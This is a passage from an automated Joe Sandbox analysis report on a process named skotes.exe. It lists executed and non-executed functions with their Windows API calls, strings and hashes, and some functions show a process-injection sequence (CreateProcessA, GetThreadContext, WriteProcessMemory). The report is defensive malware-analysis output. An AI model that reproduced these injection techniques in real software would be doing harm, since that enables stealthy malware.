Opcode ID: 25f4eee51d5eef7acfdb44f59e56ba93899965d293b766ae16e0c4b89fe0dab4
Instruction ID: 3122fea0a665ef1032727265859f97669ea40e48c80579a70b610642a631ca87
Opcode Fuzzy Hash: 25f4eee51d5eef7acfdb44f59e56ba93899965d293b766ae16e0c4b89fe0dab4
Instruction Fuzzy Hash: 28E04F34A40208B6CB26FE56E84BBC977749B1474BF94C157BC11111929BFCA78CCA89

Analysis Process: skotes.exePID: 6700, Parent PID: 432COMMON

Execution Graph

Execution Coverage:	0.5%
Dynamic/Decrypted Code Coverage:	26.9%
Signature Coverage:	0%
Total number of Nodes:	104
Total number of Limit Nodes:	5

Executed Functions

Function 00409A00 Relevance: 30.4, APIs: 16, Strings: 1, Instructions: 668COMMON

Download Yara Rule

APIs

Part of subcall function 00408B30: GetTempPathA.KERNEL32(00000104,?,3FA3610C,?,00000000), ref: 00408B77

GetFileAttributesA.KERNEL32(00000000), ref: 00409A73

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: AttributesFilePathTemp
String ID: T2F
API String ID: 3199926297-3862687658
Opcode ID: 84fbc6621e579e57008791c477808e32c3563abeb327e72a22d70cef3c3b911a
Instruction ID: f8d341d7b221fbf4855467c9c2f70b5ca956d984b14cba194293e40f11c0d304
Opcode Fuzzy Hash: 84fbc6621e579e57008791c477808e32c3563abeb327e72a22d70cef3c3b911a
Instruction Fuzzy Hash: D942E770D00244DBEF14EBB8C6497DE7BB2AF06314F24466AD411773C2D77D5A848BAA

Function 0043652B Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,0043652A,?,?,?,?,?,00437661), ref: 0043654D
TerminateProcess.KERNEL32(00000000,?,0043652A,?,?,?,?,?,00437661), ref: 00436554
ExitProcess.KERNEL32 ref: 00436566

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 04b207d0b889d00e4800d5972e07640bc64685a596502c952aa2fb778607a5b5
Instruction ID: 8ba592f2701f3bed1e9346099357e5860ce392234eb0f7d34856f934df6fdfbc
Opcode Fuzzy Hash: 04b207d0b889d00e4800d5972e07640bc64685a596502c952aa2fb778607a5b5
Instruction Fuzzy Hash: D7E0EC35000649BFCF116F59ED0D9493B69FB48746F059435FA0A86232CB7ADD92CF89

Function 020A003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 020A024D

Strings

cess, xrefs: 020A018D
kernel32.dll, xrefs: 020A008F, 020A0095

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 62dd707202abd75336868c3e5dbfb115dc0fafa5c7c726e13029abd26a9509f9
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 69527B74A01229DFDB64CFA8C994BACBBB1BF09304F5480D9E54DAB351DB30AA84DF14

Function 0043B17D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ext-ms-, xrefs: 0043B1E8
api-ms-, xrefs: 0043B1D4
G"@, xrefs: 0043B217, 0043B20D

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: G"@$api-ms-$ext-ms-
API String ID: 0-3963426706
Opcode ID: b882474e2421becce6f7ac3255c006c5444dc2a1b8804bcc2ed4a91c923f1653
Instruction ID: bce6c0f499f03009e687f81e13829494c96e42a1ade786342b8d5ba6f6eadec1
Opcode Fuzzy Hash: b882474e2421becce6f7ac3255c006c5444dc2a1b8804bcc2ed4a91c923f1653
Instruction Fuzzy Hash: 82210875A41714ABCB214B65AC4CB2F3758DB097A0F2027A3FE55A7391D738ED0086ED

Function 005AD4EE Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005AD516
Module32First.KERNEL32(00000000,00000224), ref: 005AD536

Memory Dump Source

Source File: 00000015.00000002.1705935436.00000000005AC000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_5ac000_skotes.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 24ad71b5134bf206339aeccec00d15c50f5a1588795e4d7c33bc7723633c6bb3
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: BBF06235A007116BD7203AB5A88DA6E7AFCBF4A728F140528F643918C0DB70EC458A71

Function 020A0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,020A0223,?,?), ref: 020A0E19
SetErrorMode.KERNELBASE(00000000,?,?,020A0223,?,?), ref: 020A0E1E

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 33b567a1a33f63f792c9747ca2383e3da36be57c6f4a5996c5fab058136cccf8
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: D9D0123224522CB7DB412AD4DC09BCEBB5CDF09BA6F408021FB0DE9080CBB09A4046EA

Function 0043B244 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 311fcbad5a498476ba4258b7768733b558a54d480fd29b7d435a1f88038dd687
Instruction ID: 4c620e143bcf96f25956d88b1cbf9dacd5dc84731e444759e69defc360d9fbde
Opcode Fuzzy Hash: 311fcbad5a498476ba4258b7768733b558a54d480fd29b7d435a1f88038dd687
Instruction Fuzzy Hash: C801D637700511AF9B168E6AEC49F5B3396EB89370B245262FB00DB164EB74D80196DA

Function 005AD1AD Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005AD1FE

Memory Dump Source

Source File: 00000015.00000002.1705935436.00000000005AC000.00000040.00000020.00020000.00000000.sdmp, Offset: 005AC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_5ac000_skotes.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 9f7912d02f4bf927bbd7c56dd2bbb282987220d1b5ef8e1e91fcb4337ba5c931
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 82112B79A00208EFDB01DF98C989E98BFF5AF08350F0580A4F9489B362D371EA50DF90

Non-executed Functions

Function 004070A0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 121memoryprocessthreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004070CD
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040712B
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00407144
GetThreadContext.KERNEL32(?,00000000), ref: 00407159
ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 00407179
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 004071BB
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 004071D8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00407291

Strings

invalid stoi argument, xrefs: 00407090
VUUU, xrefs: 00406F41
, xrefs: 00407170

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
String ID: $VUUU$invalid stoi argument
API String ID: 3796053839-3954507777
Opcode ID: 27f6c6112b243df7e53398a743d978e592acbef08456db8e92c72c1a99b34ae4
Instruction ID: 38b2a2fa096ae382cc622da32822fc99d79a3e7951b2d8ee4b07a12606b8df86
Opcode Fuzzy Hash: 27f6c6112b243df7e53398a743d978e592acbef08456db8e92c72c1a99b34ae4
Instruction Fuzzy Hash: 59418D74644301BFE7609F50DC06FAA7BE8BF88B05F000529FA84E62D1D7B4E944CB9A

Function 020A7157 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 174processmemorythreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 020A7334
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 020A7392
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 020A73AB
GetThreadContext.KERNEL32(?,00000000), ref: 020A73C0
ReadProcessMemory.KERNEL32(?,00458DF8,?,00000004,00000000), ref: 020A73E0

Strings

VUUU, xrefs: 020A71A8

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Process$AllocContextCreateFileMemoryModuleNameReadThreadVirtual
String ID: VUUU
API String ID: 338953623-2040033107
Opcode ID: 8d52878efc5f8f8a1e952e44b6c95f7c24c53631ccf418eeef8ebfb25720e601
Instruction ID: 262faf1f73378c71dd9483f748aedcb3b7b4f31b1762985d26a5a837fa29794f
Opcode Fuzzy Hash: 8d52878efc5f8f8a1e952e44b6c95f7c24c53631ccf418eeef8ebfb25720e601
Instruction Fuzzy Hash: B651C371644300AFD7209B64DC05F9ABBE9FF84B05F404529FA44E62E0DBB4E904DF5A

Function 020C107A Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 020C117D
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 020C11C9

Part of subcall function 020C28C4: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 020C29B7

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 020C1235
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 020C1251
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 020C12A5
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 020C12D2
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 020C1328

Strings

(, xrefs: 020C1189

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID: (
API String ID: 2943730970-3887548279
Opcode ID: 97f5cfb5054145a50c69719e5e21d6391f3292fc1eddb95c28002738003bc8bd
Instruction ID: a5a6afc5825767cabcd934306419b1502311919f00396f81ce8e3183ef4fcf7b
Opcode Fuzzy Hash: 97f5cfb5054145a50c69719e5e21d6391f3292fc1eddb95c28002738003bc8bd
Instruction Fuzzy Hash: 42B19AB0A00615AFCB19CF68D980A7EF7F5FF48704F24816DD809AB695D370B980DBA4

Function 020C1869 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 020C2F63: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 020C2F76

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 020C187B

Part of subcall function 020C3076: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 020C30A0
Part of subcall function 020C3076: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 020C310F

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 020C19AD
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 020C1A0D
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 020C1A19
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 020C1A54
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 020C1A75
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 020C1A81
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 020C1A8A
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 020C1AA2

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: a1a48777f2e554d2ddd9f6a5690d0a49d8e8ef93187b9066b8db567d6ac72761
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: FD8129B1E003259FCB19DFA8C580AADF7F6FF48304B2585ADD449AB702C770A942DB90

Function 00421602 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00422CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422D0F

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00421614

Part of subcall function 00422E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00422E39
Part of subcall function 00422E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00422EA8

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00421746
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 004217A6
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 004217B2
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 004217ED
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 0042180E
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 0042181A
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00421823
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 0042183B

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: 90d9306956e5cc9bb6704af0189ae29657119f80b0b7e1970bf61bc55afc2ad7
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: FA818C71F00225AFCB18DFA9D580A6EB7F1FF98304B6542AED405A7711CB74AD42CB88

Function 020CEEAF Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 020CEEE8

Part of subcall function 020C9196: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 020C91B7

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 020CEF4E
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 020CEF66
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 020CEF73

Part of subcall function 020CEA16: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 020CEA3E
Part of subcall function 020CEA16: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 020CEAD6
Part of subcall function 020CEA16: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 020CEAE0
Part of subcall function 020CEA16: Concurrency::location::_Assign.LIBCMT ref: 020CEB14
Part of subcall function 020CEA16: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 020CEB1C

Memory Dump Source

Source File: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_20a0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: 61a48eb18c36016cf9376c863cf090d5461b458c764e45c256d8a2d92b022f72
Instruction ID: 046f591eeba1bd3a9109800db1814103946e931ff7c241f0954be9d20aa40708
Opcode Fuzzy Hash: 61a48eb18c36016cf9376c863cf090d5461b458c764e45c256d8a2d92b022f72
Instruction Fuzzy Hash: A8519275A00305ABCF15EF50C899BADB776AF44714F2540ADED027B396CB30AE06DBA1

Function 0042EC48 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042EC81

Part of subcall function 00428F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00428F50

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0042ECE7
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0042ECFF
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0042ED0C

Part of subcall function 0042E7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E7D7
Part of subcall function 0042E7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E86F
Part of subcall function 0042E7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E879
Part of subcall function 0042E7AF: Concurrency::location::_Assign.LIBCMT ref: 0042E8AD
Part of subcall function 0042E7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E8B5

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: 61a48eb18c36016cf9376c863cf090d5461b458c764e45c256d8a2d92b022f72
Instruction ID: 5e7ff754d2b343dc4c16742e0cc3e1cb9d27b644ec3e5e3051372794b2f11420
Opcode Fuzzy Hash: 61a48eb18c36016cf9376c863cf090d5461b458c764e45c256d8a2d92b022f72
Instruction Fuzzy Hash: 8051E335B10225EBCF14DF52D885BAEB771AF44314F5540AAE9027B392CB78AE02CB95

Function 0041C768 Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0041C76E
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0041C77C
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0041C78D
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0041C79E
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0041C7AF
GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0041C7C0
GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0041C7D1
GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0041C7E2
GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 0041C7F3
GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0041C804
GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0041C815
GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0041C826
GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0041C837
GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0041C848
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0041C859
GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0041C86A
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0041C87B
GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0041C88C
GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 0041C89D
GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 0041C8AE
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 0041C8BF
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0041C8D0
GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 0041C8E1
GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 0041C8F2
GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 0041C903
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0041C914
GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0041C925
GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 0041C936
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0041C947
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0041C958
GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 0041C969
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 0041C97A
GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 0041C98B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 0041C99C
GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 0041C9AD
GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 0041C9BE
GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 0041C9CF
GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 0041C9E0
GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 0041C9F1
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 0041CA02
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 0041CA13

Strings

GetCurrentProcessorNumber, xrefs: 0041C8A3
CreateThreadpoolTimer, xrefs: 0041C80A
kernel32.dll, xrefs: 0041C769
FlsFree, xrefs: 0041C782
InitializeCriticalSectionEx, xrefs: 0041C7B5
GetCurrentPackageId, xrefs: 0041C8C5
SetFileInformationByHandle, xrefs: 0041C8F8
SetThreadpoolWait, xrefs: 0041C85F
WakeAllConditionVariable, xrefs: 0041C93C
CreateSemaphoreW, xrefs: 0041C7E8
GetFileInformationByHandleEx, xrefs: 0041C8E7
AcquireSRWLockExclusive, xrefs: 0041C96F
FlsSetValue, xrefs: 0041C7A4
GetLocaleInfoEx, xrefs: 0041C9F7
LCMapStringEx, xrefs: 0041CA08
WakeConditionVariable, xrefs: 0041C92B
SubmitThreadpoolWork, xrefs: 0041C9C4
CreateEventExW, xrefs: 0041C7D7
CompareStringEx, xrefs: 0041C9E6
CreateThreadpoolWork, xrefs: 0041C9B3
InitializeSRWLock, xrefs: 0041C95E
CreateSemaphoreExW, xrefs: 0041C7F9
WaitForThreadpoolTimerCallbacks, xrefs: 0041C82C
CloseThreadpoolWait, xrefs: 0041C870
FlsAlloc, xrefs: 0041C776
FreeLibraryWhenCallbackReturns, xrefs: 0041C892
FlsGetValue, xrefs: 0041C793
CreateSymbolicLinkW, xrefs: 0041C8B9
GetSystemTimePreciseAsFileTime, xrefs: 0041C909
CloseThreadpoolWork, xrefs: 0041C9D5
SetThreadpoolTimer, xrefs: 0041C81B
GetTickCount64, xrefs: 0041C8D6
ReleaseSRWLockExclusive, xrefs: 0041C991
FlushProcessWriteBuffers, xrefs: 0041C881
CloseThreadpoolTimer, xrefs: 0041C83D
SleepConditionVariableCS, xrefs: 0041C94D
TryAcquireSRWLockExclusive, xrefs: 0041C980
InitOnceExecuteOnce, xrefs: 0041C7C6
InitializeConditionVariable, xrefs: 0041C91A
CreateThreadpoolWait, xrefs: 0041C84E
SleepConditionVariableSRW, xrefs: 0041C9A2

Memory Dump Source

Source File: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.1705718825.0000000000462000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.1705718825.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_skotes.jbxd

Yara matches

Similarity

